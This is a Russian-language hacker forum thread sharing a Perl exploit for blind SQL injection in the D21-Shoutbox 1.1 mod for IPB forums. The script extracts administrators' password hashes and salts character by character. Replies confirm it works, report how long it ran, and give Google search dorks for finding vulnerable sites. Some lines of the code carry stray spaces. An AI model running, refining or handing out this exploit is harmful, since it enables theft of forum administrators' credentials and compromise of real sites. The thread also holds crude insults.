D21-Shoutbox 1.1

Уязвими параметр shout.

Вот сплойт
#!/usr/bin/perl

########################################
# Coded by k1b0rg (768620) #
# shout.pl <site> <id> #
# shout.pl http://site.ru/forum/ 1 #
# shout.pl http://site.ru/forum/ 1,2 #
########################################

use LWP::UserAgent;
my $browser = LWP::UserAgent->new();
$site=$ARGV[0];
my $admins_id=$ARGV[1];
@admin=split(',',$admins_id);
my $res=$browser->get($site.'index.php?act=Shoutbox');
if($res->content=~/act=Shoutbox&shout=(\d+)/is)
{
my $idshout=$1;
syswrite STDOUT, "\n".'Shout box found!';
my $res=$browser->get($site.'index.php?act=Shoutbox&shout='.$idshout.'\'');
if($res->content =~ /(SQL error|mySQL query error)/is)
{
syswrite STDOUT, "\n".'Mode(sql) shoutbox: [OK]';
if($res->content =~ /FROM (.*?)shoutbox/i)
{
$prefix_bd=$1;
syswrite STDOUT, "\n".'prefix_bd_shoutbox: ['.$prefix_bd.']';
&shout_sql($idshout);
}
}
else { syswrite STDOUT, "\n".'NOT Vulnerebility';}
}
else { syswrite STDOUT, "\n".'Shout box mode NOT FOUND!';}
sub shout_sql($)
{
my $idshout=$_[0];
foreach my $id(@admin)
{
syswrite STDOUT, "\n".'Admin id ('.$id.') : [';
for($i=1;$i<=32;$i++)
{
&position_shout(97,102,$i,$id,$idshout,'pass') if (!&position_shout(48,57,$i,$id,$idshout,'pass'))
}
syswrite STDOUT, ':';
for($i=1;$i<=5;$i++)
{
&position_shout(33,126,$i,$id,$idshout,'salt');
}
syswrite STDOUT, ']';
}
}
sub position_shout($$$$$$)
{
my ($j,$max,$i,$mid,$idshout,$label)=@_;
while($j<=$max)
{
if(&scan_shout($site,$j,$mid,$i,$idshout,$label)) { syswrite STDOUT, chr($j); return 1;}
$j++;
}
}
sub scan_shout($$$$$)
{
my ($site,$num,$mid,$pos,$idshout,$label)=@_;
my $field=($label eq 'pass')?('converge_pass_hash'):('converge_pass_sal t');
my $res=$browser->get($site.'index.php?act=Shoutbox&shout='.$idshout.'+and(ascii(substring((select+'.$ field.'+from+'.$prefix_bd.'members_converge+where+ converge_id='.$mid.'),'.$pos.',1))='.$num.')/*');
return 1 if($res->content=~/var\ssids\s=\s\[(\d+)\];/is);
}

Бля, незнаю что жто такое ))))))))))), но все равно плюс!!! ))))

Ну красиво!, красиво :). На перле, сплоит, да под форум который фиг найдешь ищё :).

Как всегда, киборг радует! )

Ну красиво!, красиво . На перле, сплоит, да под форум который фиг найдешь ищё .

Как всегда, киборг радует! )

типа мало Ipb шек ? =))

риспект!
кстати, под эту же версию уже был сплоит, если мне не отнимает память там скуль в параметре id была (точно не помню)..

Слайдер, протезы глаз надеваются зрачками наружу. и когда куришь надо сначала зятгиватся, держать дым в себе, а потом выдыхать. А не так как ты, куришь сначала бумагу, потом нюхаешь травку, и зализываешь клеем.

D21-Shoutbox 1.1 это мод для ipb

Я в легком ахтунге. Сплойт заработал и выдал мне хеш+сальт. Но у него ушло на это 1 час и сожрало больше 30 метров траффа.
k1b0rg - так и должен работать или это такая своеобразная защита от умных пацанов :)

так и должен работать. Просто бага такая. Час ты конечно загнул, у меня 25 минут он работает. 7 минут хеш, и 18 - соль

Респект Киборгу! Сплойт гут.

зы: для тех кто не понял: сплойт нужно подправить, а то там пару символов в смайлик преобразуется вот в такой :( .
для тех кто не может найти уязвимый форум: google intitle D21-Shoutbox
или allinurl:index.php?act=Shoutbox

эм )))))
а чо нужно подправить то? я вроде выложил рабочий )))))))

эм )))))
а чо нужно подправить то? я вроде выложил рабочий )))))))
Отредактировал свой предыдущий пост, посмотри.
Просто смайл можно не сразу заметить.

2 k1b0rg
Спасибо,но что мы надо сделать, если Shoutbox доступен только после "Login" ?

вручную юзать багу ))) хотя это наверное нереально.

будет время допишу чтобы ходил через аккаунт

будет время допишу чтобы ходил через аккаунт
Буду ждать! Спасибо заранее!